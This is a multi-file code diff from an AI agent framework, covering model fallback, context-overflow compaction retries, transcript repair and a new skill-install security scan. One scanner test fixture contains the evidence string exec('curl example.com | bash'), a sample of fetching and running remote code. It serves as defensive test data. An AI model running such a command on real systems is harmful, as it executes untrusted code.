} as OpenClawConfig;
vi.mocked(discoverModels).mockReturnValue({
find: vi.fn(() => null),
} as unknown as ReturnType<typeof discoverModels>);
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent", cfg);
expect(result.error).toBeUndefined();
expect(result.model?.api).toBe("openai-codex-responses");
expect(result.model?.id).toBe("gpt-5.3-codex");
expect(result.model?.provider).toBe("openai-codex");
});
});

View File

@@ -19,6 +19,50 @@ type InlineProviderConfig = {
models?: ModelDefinitionConfig[];
};
const OPENAI_CODEX_GPT_53_MODEL_ID = "gpt-5.3-codex";
const OPENAI_CODEX_TEMPLATE_MODEL_IDS = ["gpt-5.2-codex"] as const;
function resolveOpenAICodexGpt53FallbackModel(
provider: string,
modelId: string,
modelRegistry: ModelRegistry,
): Model<Api> | undefined {
const normalizedProvider = normalizeProviderId(provider);
const trimmedModelId = modelId.trim();
if (normalizedProvider !== "openai-codex") {
return undefined;
}
if (trimmedModelId.toLowerCase() !== OPENAI_CODEX_GPT_53_MODEL_ID) {
return undefined;
}
for (const templateId of OPENAI_CODEX_TEMPLATE_MODEL_IDS) {
const template = modelRegistry.find(normalizedProvider, templateId) as Model<Api> | null;
if (!template) {
continue;
}
return normalizeModelCompat({
...template,
id: trimmedModelId,
name: trimmedModelId,
} as Model<Api>);
}
return normalizeModelCompat({
id: trimmedModelId,
name: trimmedModelId,
api: "openai-codex-responses",
provider: normalizedProvider,
baseUrl: "https://chatgpt.com/backend-api",
reasoning: true,
input: ["text", "image"],
cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
contextWindow: DEFAULT_CONTEXT_TOKENS,
maxTokens: DEFAULT_CONTEXT_TOKENS,
} as Model<Api>);
}
export function buildInlineProviderModels(
providers: Record<string, InlineProviderConfig>,
): InlineModelEntry[] {
@@ -85,6 +129,17 @@ export function resolveModel(
modelRegistry,
};
}
// Codex gpt-5.3 forward-compat fallback must be checked BEFORE the generic providerCfg fallback.
// Otherwise, if cfg.models.providers["openai-codex"] is configured, the generic fallback fires
// with api: "openai-responses" instead of the correct "openai-codex-responses".
const codexForwardCompat = resolveOpenAICodexGpt53FallbackModel(
provider,
modelId,
modelRegistry,
);
if (codexForwardCompat) {
return { model: codexForwardCompat, authStorage, modelRegistry };
}
const providerCfg = providers[provider];
if (providerCfg || modelId.startsWith("mock-")) {
const fallbackModel: Model<Api> = normalizeModelCompat({

View File

@@ -137,6 +137,7 @@ vi.mock("../pi-embedded-helpers.js", async () => {
isFailoverErrorMessage: vi.fn(() => false),
isAuthAssistantError: vi.fn(() => false),
isRateLimitAssistantError: vi.fn(() => false),
isBillingAssistantError: vi.fn(() => false),
classifyFailoverReason: vi.fn(() => null),
formatAssistantErrorText: vi.fn(() => ""),
pickFallbackThinkingLevel: vi.fn(() => null),
@@ -214,7 +215,9 @@ describe("overflow compaction in run loop", () => {
);
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
expect(log.warn).toHaveBeenCalledWith(
expect.stringContaining("context overflow detected; attempting auto-compaction"),
expect.stringContaining(
"context overflow detected (attempt 1/3); attempting auto-compaction",
),
);
expect(log.info).toHaveBeenCalledWith(expect.stringContaining("auto-compaction succeeded"));
// Should not be an error result
@@ -241,31 +244,68 @@ describe("overflow compaction in run loop", () => {
expect(log.warn).toHaveBeenCalledWith(expect.stringContaining("auto-compaction failed"));
});
it("returns error if overflow happens again after compaction", async () => {
it("retries compaction up to 3 times before giving up", async () => {
const overflowError = new Error("request_too_large: Request size exceeds model context window");
// 4 overflow errors: 3 compaction retries + final failure
mockedRunEmbeddedAttempt
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
mockedCompactDirect
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
})
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
})
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 3", firstKeptEntryId: "entry-7", tokensBefore: 140000 },
});
const result = await runEmbeddedPiAgent(baseParams);
// Compaction attempted 3 times (max)
expect(mockedCompactDirect).toHaveBeenCalledTimes(3);
// 4 attempts: 3 overflow+compact+retry cycles + final overflow → error
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(4);
expect(result.meta.error?.kind).toBe("context_overflow");
expect(result.payloads?.[0]?.isError).toBe(true);
});
it("succeeds after second compaction attempt", async () => {
const overflowError = new Error("request_too_large: Request size exceeds model context window");
mockedRunEmbeddedAttempt
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: null }));
mockedCompactDirect.mockResolvedValueOnce({
ok: true,
compacted: true,
result: {
summary: "Compacted",
firstKeptEntryId: "entry-3",
tokensBefore: 180000,
},
});
mockedCompactDirect
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
})
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
});
const result = await runEmbeddedPiAgent(baseParams);
// Compaction attempted only once
expect(mockedCompactDirect).toHaveBeenCalledTimes(1);
// Two attempts: first overflow -> compact -> retry -> second overflow -> return error
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
expect(result.meta.error?.kind).toBe("context_overflow");
expect(result.payloads?.[0]?.isError).toBe(true);
expect(mockedCompactDirect).toHaveBeenCalledTimes(2);
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(3);
expect(result.meta.error).toBeUndefined();
});
it("does not attempt compaction for compaction_failure errors", async () => {

View File

@@ -29,9 +29,11 @@ import {
import { normalizeProviderId } from "../model-selection.js";
import { ensureOpenClawModelsJson } from "../models-config.js";
import {
BILLING_ERROR_USER_MESSAGE,
classifyFailoverReason,
formatAssistantErrorText,
isAuthAssistantError,
isBillingAssistantError,
isCompactionFailureError,
isContextOverflowError,
isFailoverAssistantError,
@@ -303,7 +305,8 @@ export async function runEmbeddedPiAgent(
}
}
let overflowCompactionAttempted = false;
const MAX_OVERFLOW_COMPACTION_ATTEMPTS = 3;
let overflowCompactionAttempts = 0;
try {
while (true) {
attemptedThinking.add(thinkLevel);
@@ -373,13 +376,23 @@ export async function runEmbeddedPiAgent(
if (promptError && !aborted) {
const errorText = describeUnknownError(promptError);
if (isContextOverflowError(errorText)) {
const msgCount = attempt.messagesSnapshot?.length ?? 0;
log.warn(
`[context-overflow-diag] sessionKey=${params.sessionKey ?? params.sessionId} ` +
`provider=${provider}/${modelId} messages=${msgCount} ` +
`sessionFile=${params.sessionFile} compactionAttempts=${overflowCompactionAttempts} ` +
`error=${errorText.slice(0, 200)}`,
);
const isCompactionFailure = isCompactionFailureError(errorText);
// Attempt auto-compaction on context overflow (not compaction_failure)
if (!isCompactionFailure && !overflowCompactionAttempted) {
if (
!isCompactionFailure &&
overflowCompactionAttempts < MAX_OVERFLOW_COMPACTION_ATTEMPTS
) {
overflowCompactionAttempts++;
log.warn(
`context overflow detected; attempting auto-compaction for ${provider}/${modelId}`,
`context overflow detected (attempt ${overflowCompactionAttempts}/${MAX_OVERFLOW_COMPACTION_ATTEMPTS}); attempting auto-compaction for ${provider}/${modelId}`,
);
overflowCompactionAttempted = true;
const compactResult = await compactEmbeddedPiSessionDirect({
sessionId: params.sessionId,
sessionKey: params.sessionKey,
@@ -538,6 +551,7 @@ export async function runEmbeddedPiAgent(
const authFailure = isAuthAssistantError(lastAssistant);
const rateLimitFailure = isRateLimitAssistantError(lastAssistant);
const billingFailure = isBillingAssistantError(lastAssistant);
const failoverFailure = isFailoverAssistantError(lastAssistant);
const assistantFailoverReason = classifyFailoverReason(lastAssistant?.errorMessage ?? "");
const cloudCodeAssistFormatError = attempt.cloudCodeAssistFormatError;
@@ -609,9 +623,11 @@ export async function runEmbeddedPiAgent(
? "LLM request timed out."
: rateLimitFailure
? "LLM request rate limited."
: authFailure
? "LLM request unauthorized."
: "LLM request failed.");
: billingFailure
? BILLING_ERROR_USER_MESSAGE
: authFailure
? "LLM request unauthorized."
: "LLM request failed.");
const status =
resolveFailoverStatus(assistantFailoverReason ?? "unknown") ??
(isTimeoutErrorMessage(message) ? 408 : undefined);

View File

@@ -1,10 +1,50 @@
import fs from "node:fs";
import os from "node:os";
import path from "node:path";
import { describe, expect, it, vi } from "vitest";
import { afterAll, beforeAll, describe, expect, it, vi } from "vitest";
import type { OpenClawConfig } from "../config/config.js";
import type { ExecApprovalsResolved } from "../infra/exec-approvals.js";
import { createOpenClawCodingTools } from "./pi-tools.js";
const previousBundledPluginsDir = process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
beforeAll(() => {
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = path.join(
os.tmpdir(),
"openclaw-test-no-bundled-extensions",
);
});
afterAll(() => {
if (previousBundledPluginsDir === undefined) {
delete process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
} else {
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = previousBundledPluginsDir;
}
});
vi.mock("../infra/shell-env.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
return {
...mod,
getShellPathFromLoginShell: vi.fn(() => "/usr/bin:/bin"),
resolveShellEnvFallbackTimeoutMs: vi.fn(() => 500),
};
});
vi.mock("../plugins/tools.js", () => ({
getPluginToolMeta: () => undefined,
resolvePluginTools: () => [],
}));
vi.mock("../infra/shell-env.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
return { ...mod, getShellPathFromLoginShell: () => null };
});
vi.mock("../plugins/tools.js", () => ({
resolvePluginTools: () => [],
getPluginToolMeta: () => undefined,
}));
vi.mock("../infra/exec-approvals.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/exec-approvals.js")>();
@@ -46,6 +86,7 @@ describe("createOpenClawCodingTools safeBins", () => {
return;
}
const { createOpenClawCodingTools } = await import("./pi-tools.js");
const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-safe-bins-"));
const cfg: OpenClawConfig = {
tools: {
@@ -68,10 +109,22 @@ describe("createOpenClawCodingTools safeBins", () => {
expect(execTool).toBeDefined();
const marker = `safe-bins-${Date.now()}`;
const result = await execTool!.execute("call1", {
command: `echo ${marker}`,
workdir: tmpDir,
});
const prevShellEnvTimeoutMs = process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = "1000";
const result = await (async () => {
try {
return await execTool!.execute("call1", {
command: `echo ${marker}`,
workdir: tmpDir,
});
} finally {
if (prevShellEnvTimeoutMs === undefined) {
delete process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
} else {
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = prevShellEnvTimeoutMs;
}
}
})();
const text = result.content.find((content) => content.type === "text")?.text ?? "";
expect(result.details.status).toBe("completed");

View File

@@ -1,9 +1,18 @@
import fs from "node:fs/promises";
import os from "node:os";
import path from "node:path";
import { describe, expect, it } from "vitest";
import { describe, expect, it, vi } from "vitest";
import { createOpenClawCodingTools } from "./pi-tools.js";
vi.mock("../plugins/tools.js", () => ({
getPluginToolMeta: () => undefined,
resolvePluginTools: () => [],
}));
vi.mock("../infra/shell-env.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
return { ...mod, getShellPathFromLoginShell: () => null };
});
async function withTempDir<T>(prefix: string, fn: (dir: string) => Promise<T>) {
const dir = await fs.mkdtemp(path.join(os.tmpdir(), prefix));
try {
@@ -22,12 +31,11 @@ describe("workspace path resolution", () => {
it("reads relative paths against workspaceDir even after cwd changes", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-cwd-", async (otherDir) => {
const prevCwd = process.cwd();
const testFile = "read.txt";
const contents = "workspace read ok";
await fs.writeFile(path.join(workspaceDir, testFile), contents, "utf8");
process.chdir(otherDir);
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
try {
const tools = createOpenClawCodingTools({ workspaceDir });
const readTool = tools.find((tool) => tool.name === "read");
@@ -36,7 +44,7 @@ describe("workspace path resolution", () => {
const result = await readTool?.execute("ws-read", { path: testFile });
expect(getTextContent(result)).toContain(contents);
} finally {
process.chdir(prevCwd);
cwdSpy.mockRestore();
}
});
});
@@ -45,11 +53,10 @@ describe("workspace path resolution", () => {
it("writes relative paths against workspaceDir even after cwd changes", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-cwd-", async (otherDir) => {
const prevCwd = process.cwd();
const testFile = "write.txt";
const contents = "workspace write ok";
process.chdir(otherDir);
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
try {
const tools = createOpenClawCodingTools({ workspaceDir });
const writeTool = tools.find((tool) => tool.name === "write");
@@ -63,7 +70,7 @@ describe("workspace path resolution", () => {
const written = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
expect(written).toBe(contents);
} finally {
process.chdir(prevCwd);
cwdSpy.mockRestore();
}
});
});
@@ -72,11 +79,10 @@ describe("workspace path resolution", () => {
it("edits relative paths against workspaceDir even after cwd changes", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-cwd-", async (otherDir) => {
const prevCwd = process.cwd();
const testFile = "edit.txt";
await fs.writeFile(path.join(workspaceDir, testFile), "hello world", "utf8");
process.chdir(otherDir);
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
try {
const tools = createOpenClawCodingTools({ workspaceDir });
const editTool = tools.find((tool) => tool.name === "edit");
@@ -91,7 +97,7 @@ describe("workspace path resolution", () => {
const updated = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
expect(updated).toBe("hello openclaw");
} finally {
process.chdir(prevCwd);
cwdSpy.mockRestore();
}
});
});
@@ -99,7 +105,7 @@ describe("workspace path resolution", () => {
it("defaults exec cwd to workspaceDir when workdir is omitted", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
const tools = createOpenClawCodingTools({ workspaceDir });
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
const execTool = tools.find((tool) => tool.name === "exec");
expect(execTool).toBeDefined();
@@ -122,7 +128,7 @@ describe("workspace path resolution", () => {
it("lets exec workdir override the workspace default", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-override-", async (overrideDir) => {
const tools = createOpenClawCodingTools({ workspaceDir });
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
const execTool = tools.find((tool) => tool.name === "exec");
expect(execTool).toBeDefined();

View File

@@ -3,6 +3,7 @@ import { describe, expect, it } from "vitest";
import {
sanitizeToolCallInputs,
sanitizeToolUseResultPairing,
repairToolUseResultPairing,
} from "./session-transcript-repair.js";
describe("sanitizeToolUseResultPairing", () => {
@@ -112,6 +113,100 @@ describe("sanitizeToolUseResultPairing", () => {
expect(out.some((m) => m.role === "toolResult")).toBe(false);
expect(out.map((m) => m.role)).toEqual(["user", "assistant"]);
});
it("skips tool call extraction for assistant messages with stopReason 'error'", () => {
// When an assistant message has stopReason: "error", its tool_use blocks may be
// incomplete/malformed. We should NOT create synthetic tool_results for them,
// as this causes API 400 errors: "unexpected tool_use_id found in tool_result blocks"
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_error", name: "exec", arguments: {} }],
stopReason: "error",
},
{ role: "user", content: "something went wrong" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// Should NOT add synthetic tool results for errored messages
expect(result.added).toHaveLength(0);
// The assistant message should be passed through unchanged
expect(result.messages[0]?.role).toBe("assistant");
expect(result.messages[1]?.role).toBe("user");
expect(result.messages).toHaveLength(2);
});
it("skips tool call extraction for assistant messages with stopReason 'aborted'", () => {
// When a request is aborted mid-stream, the assistant message may have incomplete
// tool_use blocks (with partialJson). We should NOT create synthetic tool_results.
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_aborted", name: "Bash", arguments: {} }],
stopReason: "aborted",
},
{ role: "user", content: "retrying after abort" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// Should NOT add synthetic tool results for aborted messages
expect(result.added).toHaveLength(0);
// Messages should be passed through without synthetic insertions
expect(result.messages).toHaveLength(2);
expect(result.messages[0]?.role).toBe("assistant");
expect(result.messages[1]?.role).toBe("user");
});
it("still repairs tool results for normal assistant messages with stopReason 'toolUse'", () => {
// Normal tool calls (stopReason: "toolUse" or "stop") should still be repaired
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_normal", name: "read", arguments: {} }],
stopReason: "toolUse",
},
{ role: "user", content: "user message" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// Should add a synthetic tool result for the missing result
expect(result.added).toHaveLength(1);
expect(result.added[0]?.toolCallId).toBe("call_normal");
});
it("drops orphan tool results that follow an aborted assistant message", () => {
// When an assistant message is aborted, any tool results that follow should be
// dropped as orphans (since we skip extracting tool calls from aborted messages).
// This addresses the edge case where a partial tool result was persisted before abort.
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_aborted", name: "exec", arguments: {} }],
stopReason: "aborted",
},
{
role: "toolResult",
toolCallId: "call_aborted",
toolName: "exec",
content: [{ type: "text", text: "partial result" }],
isError: false,
},
{ role: "user", content: "retrying" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// The orphan tool result should be dropped
expect(result.droppedOrphanCount).toBe(1);
expect(result.messages).toHaveLength(2);
expect(result.messages[0]?.role).toBe("assistant");
expect(result.messages[1]?.role).toBe("user");
// No synthetic results should be added
expect(result.added).toHaveLength(0);
});
});
describe("sanitizeToolCallInputs", () => {

View File

@@ -213,6 +213,19 @@ export function repairToolUseResultPairing(messages: AgentMessage[]): ToolUseRep
}
const assistant = msg as Extract<AgentMessage, { role: "assistant" }>;
// Skip tool call extraction for aborted or errored assistant messages.
// When stopReason is "error" or "aborted", the tool_use blocks may be incomplete
// (e.g., partialJson: true) and should not have synthetic tool_results created.
// Creating synthetic results for incomplete tool calls causes API 400 errors:
// "unexpected tool_use_id found in tool_result blocks"
// See: https://github.com/openclaw/openclaw/issues/4597
const stopReason = (assistant as { stopReason?: string }).stopReason;
if (stopReason === "error" || stopReason === "aborted") {
out.push(msg);
continue;
}
const toolCalls = extractToolCallsFromAssistant(assistant);
if (toolCalls.length === 0) {
out.push(msg);

View File

@@ -0,0 +1,99 @@
import { beforeEach, describe, expect, it, vi } from "vitest";
const callGatewayMock = vi.fn();
vi.mock("../gateway/call.js", () => ({
callGateway: (opts: unknown) => callGatewayMock(opts),
}));
let configOverride: ReturnType<(typeof import("../config/config.js"))["loadConfig"]> = {
session: {
mainKey: "main",
scope: "per-sender",
},
};
vi.mock("../config/config.js", async (importOriginal) => {
const actual = await importOriginal<typeof import("../config/config.js")>();
return {
...actual,
loadConfig: () => configOverride,
resolveGatewayPort: () => 18789,
};
});
import "./test-helpers/fast-core-tools.js";
import { createOpenClawTools } from "./openclaw-tools.js";
import {
listSubagentRunsForRequester,
resetSubagentRegistryForTests,
} from "./subagent-registry.js";
describe("sessions_spawn requesterOrigin threading", () => {
beforeEach(() => {
resetSubagentRegistryForTests();
callGatewayMock.mockReset();
configOverride = {
session: {
mainKey: "main",
scope: "per-sender",
},
};
callGatewayMock.mockImplementation(async (opts: unknown) => {
const req = opts as { method?: string };
if (req.method === "agent") {
return { runId: "run-1", status: "accepted", acceptedAt: 1 };
}
// Prevent background announce flow by returning a non-terminal status.
if (req.method === "agent.wait") {
return { runId: "run-1", status: "running" };
}
return {};
});
});
it("captures threadId in requesterOrigin", async () => {
const tool = createOpenClawTools({
agentSessionKey: "main",
agentChannel: "telegram",
agentTo: "telegram:123",
agentThreadId: 42,
}).find((candidate) => candidate.name === "sessions_spawn");
if (!tool) {
throw new Error("missing sessions_spawn tool");
}
await tool.execute("call", {
task: "do thing",
runTimeoutSeconds: 1,
});
const runs = listSubagentRunsForRequester("main");
expect(runs).toHaveLength(1);
expect(runs[0]?.requesterOrigin).toMatchObject({
channel: "telegram",
to: "telegram:123",
threadId: 42,
});
});
it("stores requesterOrigin without threadId when none is provided", async () => {
const tool = createOpenClawTools({
agentSessionKey: "main",
agentChannel: "telegram",
agentTo: "telegram:123",
}).find((candidate) => candidate.name === "sessions_spawn");
if (!tool) {
throw new Error("missing sessions_spawn tool");
}
await tool.execute("call", {
task: "do thing",
runTimeoutSeconds: 1,
});
const runs = listSubagentRunsForRequester("main");
expect(runs).toHaveLength(1);
expect(runs[0]?.requesterOrigin?.threadId).toBeUndefined();
});
});

View File

@@ -0,0 +1,114 @@
import fs from "node:fs/promises";
import os from "node:os";
import path from "node:path";
import { beforeEach, describe, expect, it, vi } from "vitest";
import { installSkill } from "./skills-install.js";
const runCommandWithTimeoutMock = vi.fn();
const scanDirectoryWithSummaryMock = vi.fn();
vi.mock("../process/exec.js", () => ({
runCommandWithTimeout: (...args: unknown[]) => runCommandWithTimeoutMock(...args),
}));
vi.mock("../security/skill-scanner.js", async (importOriginal) => {
const actual = await importOriginal<typeof import("../security/skill-scanner.js")>();
return {
...actual,
scanDirectoryWithSummary: (...args: unknown[]) => scanDirectoryWithSummaryMock(...args),
};
});
async function writeInstallableSkill(workspaceDir: string, name: string): Promise<string> {
const skillDir = path.join(workspaceDir, "skills", name);
await fs.mkdir(skillDir, { recursive: true });
await fs.writeFile(
path.join(skillDir, "SKILL.md"),
`---
name: ${name}
description: test skill
metadata: {"openclaw":{"install":[{"id":"deps","kind":"node","package":"example-package"}]}}
---
# ${name}
`,
"utf-8",
);
await fs.writeFile(path.join(skillDir, "runner.js"), "export {};\n", "utf-8");
return skillDir;
}
describe("installSkill code safety scanning", () => {
beforeEach(() => {
runCommandWithTimeoutMock.mockReset();
scanDirectoryWithSummaryMock.mockReset();
runCommandWithTimeoutMock.mockResolvedValue({
code: 0,
stdout: "ok",
stderr: "",
signal: null,
killed: false,
});
});
it("adds detailed warnings for critical findings and continues install", async () => {
const workspaceDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-skills-install-"));
try {
const skillDir = await writeInstallableSkill(workspaceDir, "danger-skill");
scanDirectoryWithSummaryMock.mockResolvedValue({
scannedFiles: 1,
critical: 1,
warn: 0,
info: 0,
findings: [
{
ruleId: "dangerous-exec",
severity: "critical",
file: path.join(skillDir, "runner.js"),
line: 1,
message: "Shell command execution detected (child_process)",
evidence: 'exec("curl example.com | bash")',
},
],
});
const result = await installSkill({
workspaceDir,
skillName: "danger-skill",
installId: "deps",
});
expect(result.ok).toBe(true);
expect(result.warnings?.some((warning) => warning.includes("dangerous code patterns"))).toBe(
true,
);
expect(result.warnings?.some((warning) => warning.includes("runner.js:1"))).toBe(true);
} finally {
await fs.rm(workspaceDir, { recursive: true, force: true }).catch(() => undefined);
}
});
it("warns and continues when skill scan fails", async () => {
const workspaceDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-skills-install-"));
try {
await writeInstallableSkill(workspaceDir, "scanfail-skill");
scanDirectoryWithSummaryMock.mockRejectedValue(new Error("scanner exploded"));
const result = await installSkill({
workspaceDir,
skillName: "scanfail-skill",
installId: "deps",
});
expect(result.ok).toBe(true);
expect(result.warnings?.some((warning) => warning.includes("code safety scan failed"))).toBe(
true,
);
expect(result.warnings?.some((warning) => warning.includes("Installation continues"))).toBe(
true,
);
} finally {
await fs.rm(workspaceDir, { recursive: true, force: true }).catch(() => undefined);
}
});
});

View File

@@ -7,6 +7,7 @@ import type { OpenClawConfig } from "../config/config.js";
import { resolveBrewExecutable } from "../infra/brew.js";
import { fetchWithSsrFGuard } from "../infra/net/fetch-guard.js";
import { runCommandWithTimeout } from "../process/exec.js";
import { scanDirectoryWithSummary } from "../security/skill-scanner.js";
import { CONFIG_DIR, ensureDir, resolveUserPath } from "../utils.js";
import {
hasBinary,
@@ -32,6 +33,7 @@ export type SkillInstallResult = {
stdout: string;
stderr: string;
code: number | null;
warnings?: string[];
};
function isNodeReadableStream(value: unknown): value is NodeJS.ReadableStream {
@@ -77,6 +79,57 @@ function formatInstallFailureMessage(result: {
return `Install failed (${code}): ${summary}`;
}
function withWarnings(result: SkillInstallResult, warnings: string[]): SkillInstallResult {
if (warnings.length === 0) {
return result;
}
return {
...result,
warnings: warnings.slice(),
};
}
function formatScanFindingDetail(
rootDir: string,
finding: { message: string; file: string; line: number },
): string {
const relativePath = path.relative(rootDir, finding.file);
const filePath =
relativePath && relativePath !== "." && !relativePath.startsWith("..")
? relativePath
: path.basename(finding.file);
return `${finding.message} (${filePath}:${finding.line})`;
}
async function collectSkillInstallScanWarnings(entry: SkillEntry): Promise<string[]> {
const warnings: string[] = [];
const skillName = entry.skill.name;
const skillDir = path.resolve(entry.skill.baseDir);
try {
const summary = await scanDirectoryWithSummary(skillDir);
if (summary.critical > 0) {
const criticalDetails = summary.findings
.filter((finding) => finding.severity === "critical")
.map((finding) => formatScanFindingDetail(skillDir, finding))
.join("; ");
warnings.push(
`WARNING: Skill "${skillName}" contains dangerous code patterns: ${criticalDetails}`,
);
} else if (summary.warn > 0) {
warnings.push(
`Skill "${skillName}" has ${summary.warn} suspicious code pattern(s). Run "openclaw security audit --deep" for details.`,
);
}
} catch (err) {
warnings.push(
`Skill "${skillName}" code safety scan failed (${String(err)}). Installation continues; run "openclaw security audit --deep" after install.`,
);
}
return warnings;
}
function resolveInstallId(spec: SkillInstallSpec, index: number): string {
return (spec.id ?? `${spec.kind}-${index}`).trim();
}
@@ -356,40 +409,51 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
}
const spec = findInstallSpec(entry, params.installId);
const warnings = await collectSkillInstallScanWarnings(entry);
if (!spec) {
return {
ok: false,
message: `Installer not found: ${params.installId}`,
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: `Installer not found: ${params.installId}`,
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
if (spec.kind === "download") {
return await installDownloadSpec({ entry, spec, timeoutMs });
const downloadResult = await installDownloadSpec({ entry, spec, timeoutMs });
return withWarnings(downloadResult, warnings);
}
const prefs = resolveSkillsInstallPreferences(params.config);
const command = buildInstallCommand(spec, prefs);
if (command.error) {
return {
ok: false,
message: command.error,
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: command.error,
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
const brewExe = hasBinary("brew") ? "brew" : resolveBrewExecutable();
if (spec.kind === "brew" && !brewExe) {
return {
ok: false,
message: "brew not installed",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "brew not installed",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
if (spec.kind === "uv" && !hasBinary("uv")) {
if (brewExe) {
@@ -397,32 +461,41 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
timeoutMs,
});
if (brewResult.code !== 0) {
return {
ok: false,
message: "Failed to install uv (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
};
return withWarnings(
{
ok: false,
message: "Failed to install uv (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
},
warnings,
);
}
} else {
return {
ok: false,
message: "uv not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "uv not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
}
if (!command.argv || command.argv.length === 0) {
return {
ok: false,
message: "invalid install command",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "invalid install command",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
if (spec.kind === "brew" && brewExe && command.argv[0] === "brew") {
@@ -435,22 +508,28 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
timeoutMs,
});
if (brewResult.code !== 0) {
return {
ok: false,
message: "Failed to install go (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
};
return withWarnings(
{
ok: false,
message: "Failed to install go (brew)",
stdout: brewResult.stdout.trim(),
stderr: brewResult.stderr.trim(),
code: brewResult.code,
},
warnings,
);
}
} else {
return {
ok: false,
message: "go not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
};
return withWarnings(
{
ok: false,
message: "go not installed (install via brew)",
stdout: "",
stderr: "",
code: null,
},
warnings,
);
}
}
@@ -479,11 +558,14 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
})();
const success = result.code === 0;
return {
ok: success,
message: success ? "Installed" : formatInstallFailureMessage(result),
stdout: result.stdout.trim(),
stderr: result.stderr.trim(),
code: result.code,
};
return withWarnings(
{
ok: success,
message: success ? "Installed" : formatInstallFailureMessage(result),
stdout: result.stdout.trim(),
stderr: result.stderr.trim(),
code: result.code,
},
warnings,
);
}

View File

@@ -198,6 +198,85 @@ describe("subagent announce formatting", () => {
expect(call?.params?.accountId).toBe("kev");
});
it("includes threadId when origin has an active topic/thread", async () => {
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
